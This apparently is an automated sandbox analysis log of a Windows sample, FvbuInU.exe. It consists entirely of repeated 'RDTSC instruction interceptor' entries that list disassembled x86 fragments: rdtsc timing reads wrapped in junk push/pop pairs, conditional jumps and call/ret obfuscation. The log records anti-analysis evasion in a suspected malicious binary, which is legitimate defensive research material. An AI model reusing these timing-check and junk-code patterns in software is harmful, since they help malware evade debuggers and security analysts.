Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5EBFC second address: F5EC2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8E84B4EF83h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ecx 0x00000012 popad 0x00000013 js 00007F8E84B4EF8Ch 0x00000019 jno 00007F8E84B4EF78h 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5F128 second address: F5F12E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5F12E second address: F5F134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5F520 second address: F5F559 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 push edx 0x00000006 pop edx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F8E8511F5E5h 0x00000010 jmp 00007F8E8511F5E7h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5F81A second address: F5F81E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F5FAF3 second address: F5FB07 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jg 00007F8E8511F5D8h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F602FE second address: F60303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F60303 second address: F6031A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8E8511F5E3h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6047D second address: F60483 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F62DDF second address: F62DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F62DE5 second address: F62E0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F8E84B4EF76h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 jmp 00007F8E84B4EF85h 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F62E0D second address: F62E12 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F62F6B second address: F62F75 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F630A9 second address: F630E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jg 00007F8E8511F5F1h 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F630E6 second address: F630EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F63229 second address: F6322D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F33268 second address: F3329A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF83h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop esi 0x0000000c push esi 0x0000000d jmp 00007F8E84B4EF7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 ja 00007F8E84B4EF76h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F292D1 second address: F292E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5DAh 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F292E5 second address: F292E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F292E9 second address: F292ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6AFC4 second address: F6AFD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jno 00007F8E84B4EF78h 0x0000000b pop edx 0x0000000c push ebx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B147 second address: F6B14C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B95C second address: F6B976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F8E84B4EF76h 0x0000000a popad 0x0000000b ja 00007F8E84B4EF7Ch 0x00000011 jno 00007F8E84B4EF76h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B976 second address: F6B97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B97C second address: F6B982 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B982 second address: F6B9A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8E8511F5E8h 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B9A6 second address: F6B9B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push edi 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B9B0 second address: F6B9C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8E8511F5DDh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6B9C3 second address: F6B9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CA42 second address: F6CA47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CA47 second address: F6CA66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push edx 0x0000000c jp 00007F8E84B4EF78h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CA66 second address: F6CA6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CBDA second address: F6CBE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CD82 second address: F6CD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CE25 second address: F6CE2F instructions: 0x00000000 rdtsc 0x00000002 js 00007F8E84B4EF76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CEE6 second address: F6CEF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CF95 second address: F6CF9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CF9A second address: F6CFC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jbe 00007F8E8511F5DCh 0x00000012 jnp 00007F8E8511F5D6h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6CFC2 second address: F6CFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6D092 second address: F6D096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6D76E second address: F6D773 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6D853 second address: F6D858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6E05C second address: F6E062 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6EA55 second address: F6EACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F8E8511F5E8h 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F8E8511F5D8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 mov dword ptr [ebp+122D1901h], ebx 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007F8E8511F5D8h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000017h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+1247650Eh], ebx 0x00000051 xchg eax, ebx 0x00000052 push eax 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F6FAE3 second address: F6FAE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7050B second address: F70532 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 jne 00007F8E8511F5D6h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F71CC2 second address: F71CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F70E12 second address: F70E17 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F71CC6 second address: F71CE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F8E84B4EF76h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F70E17 second address: F70E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F71CE8 second address: F71CF6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F8E84B4EF76h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F70E27 second address: F70E31 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E8511F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F727A9 second address: F727AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F727AD second address: F72849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F8E8511F5E2h 0x00000011 pop edi 0x00000012 nop 0x00000013 push 00000000h 0x00000015 push edx 0x00000016 call 00007F8E8511F5D8h 0x0000001b pop edx 0x0000001c mov dword ptr [esp+04h], edx 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc edx 0x00000029 push edx 0x0000002a ret 0x0000002b pop edx 0x0000002c ret 0x0000002d mov esi, ecx 0x0000002f mov dword ptr [ebp+122D2F97h], ebx 0x00000035 push 00000000h 0x00000037 call 00007F8E8511F5E1h 0x0000003c jg 00007F8E8511F5DCh 0x00000042 pop edi 0x00000043 push 00000000h 0x00000045 push 00000000h 0x00000047 push ecx 0x00000048 call 00007F8E8511F5D8h 0x0000004d pop ecx 0x0000004e mov dword ptr [esp+04h], ecx 0x00000052 add dword ptr [esp+04h], 00000015h 0x0000005a inc ecx 0x0000005b push ecx 0x0000005c ret 0x0000005d pop ecx 0x0000005e ret 0x0000005f push eax 0x00000060 push eax 0x00000061 push edx 0x00000062 ja 00007F8E8511F5D8h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7328A second address: F7330E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8E84B4EF7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F8E84B4EF78h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 push 00000000h 0x00000029 pushad 0x0000002a jmp 00007F8E84B4EF7Eh 0x0000002f add edi, dword ptr [ebp+122D274Bh] 0x00000035 popad 0x00000036 push 00000000h 0x00000038 cmc 0x00000039 call 00007F8E84B4EF7Eh 0x0000003e jmp 00007F8E84B4EF87h 0x00000043 pop esi 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jng 00007F8E84B4EF78h 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F72563 second address: F7256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F73030 second address: F73036 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F73036 second address: F7303A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F773DC second address: F773E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F77997 second address: F7799B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7799B second address: F779A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F779A9 second address: F779B3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8E8511F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F77B1A second address: F77B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F79B4E second address: F79BDE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8E8511F5D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov edi, dword ptr [ebp+124733C9h] 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F8E8511F5D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e cld 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007F8E8511F5D8h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b mov dword ptr [ebp+1245BAAAh], ebx 0x00000051 xchg eax, esi 0x00000052 pushad 0x00000053 pushad 0x00000054 pushad 0x00000055 popad 0x00000056 pushad 0x00000057 popad 0x00000058 popad 0x00000059 jmp 00007F8E8511F5DEh 0x0000005e popad 0x0000005f push eax 0x00000060 push ebx 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F8E8511F5E0h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F77B1F second address: F77B4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jnp 00007F8E84B4EF89h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F8E84B4EF7Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7BD9F second address: F7BDB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E8511F5DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F8E8511F5DCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7CC76 second address: F7CC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7CC7A second address: F7CD09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F8E8511F5DCh 0x0000000c jbe 00007F8E8511F5D6h 0x00000012 popad 0x00000013 push eax 0x00000014 jno 00007F8E8511F5ECh 0x0000001a nop 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F8E8511F5D8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Ch 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 push 00000000h 0x00000037 mov edi, 1611809Fh 0x0000003c push 00000000h 0x0000003e push 00000000h 0x00000040 push ecx 0x00000041 call 00007F8E8511F5D8h 0x00000046 pop ecx 0x00000047 mov dword ptr [esp+04h], ecx 0x0000004b add dword ptr [esp+04h], 00000019h 0x00000053 inc ecx 0x00000054 push ecx 0x00000055 ret 0x00000056 pop ecx 0x00000057 ret 0x00000058 sbb ebx, 6A4719D1h 0x0000005e push eax 0x0000005f pushad 0x00000060 jg 00007F8E8511F5DCh 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EAE8 second address: F7EAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EAEC second address: F7EAF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EAF2 second address: F7EB57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8E84B4EF7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add dword ptr [ebp+122D1BC3h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F8E84B4EF78h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e stc 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edi 0x00000034 call 00007F8E84B4EF78h 0x00000039 pop edi 0x0000003a mov dword ptr [esp+04h], edi 0x0000003e add dword ptr [esp+04h], 00000015h 0x00000046 inc edi 0x00000047 push edi 0x00000048 ret 0x00000049 pop edi 0x0000004a ret 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EB57 second address: F7EB5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EB5B second address: F7EB61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7FA18 second address: F7FA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EC78 second address: F7EC7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EC7C second address: F7EC82 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F809C6 second address: F809CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\FvbuInU.exe	RDTSC instruction interceptor: First address: F7EC82 second address: F7ECEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8E8511F5DFh 0x00000008 jbe 00007F8E8511F5D6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 mov edi, dword ptr [ebp+122D28F2h] 0x00000018 push dword ptr fs:[00000000h] 0x0000001f mov edi, eax 0x00000021 mov dword ptr fs:[00000000h], esp 0x00000028 mov edi, dword ptr [ebp+122D188Fh] 0x0000002e mov eax, dword ptr [ebp+122D0855h] 0x00000034 mov edi, dword ptr [ebp+1247468Fh] 0x0000003a push FFFFFFFFh 0x0000003c push 00000000h 0x0000003e push ebp 0x0000003f call 00007F8E8511F5D8h 0x00000044 pop ebp 0x00000045 mov dword ptr [esp+04h], ebp 0x00000049 add dword ptr [esp+04h], 0000001Ah 0x00000051 inc ebp 0x00000052 push ebp 0x00000053 ret 0x00000054 pop ebp 0x00000055 ret 0x00000056 nop 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
